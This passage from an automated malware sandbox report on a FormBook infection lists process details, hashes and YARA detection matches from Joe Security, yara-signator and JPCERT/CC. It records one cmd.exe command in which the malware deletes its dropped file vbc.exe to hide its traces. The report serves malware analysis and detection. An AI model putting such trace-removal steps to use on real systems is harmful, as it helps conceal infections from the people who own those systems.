                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2218333156.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2218333156.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              Reputation:low

                                                                                                                                                              General

                                                                                                                                                              Start time:07:30:19
                                                                                                                                                              Start date:27/01/2021
                                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:
                                                                                                                                                              Imagebase:0xffca0000
                                                                                                                                                              File size:3229696 bytes
                                                                                                                                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:07:30:38
                                                                                                                                                              Start date:27/01/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\help.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\help.exe
                                                                                                                                                              Imagebase:0xed0000
                                                                                                                                                              File size:8704 bytes
                                                                                                                                                              MD5 hash:0F488C73AA50C2FC1361F19E8FC19926
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2375584892.00000000003C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2375584892.00000000003C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2375584892.00000000003C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2375310907.0000000000150000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2375310907.0000000000150000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2375310907.0000000000150000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2375232552.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2375232552.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2375232552.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              Reputation:moderate

                                                                                                                                                              General

                                                                                                                                                              Start time:07:30:42
                                                                                                                                                              Start date:27/01/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                              Imagebase:0x4a660000
                                                                                                                                                              File size:302592 bytes
                                                                                                                                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              Disassembly

                                                                                                                                                              Code Analysis

                                                                                                                                                              Reset < >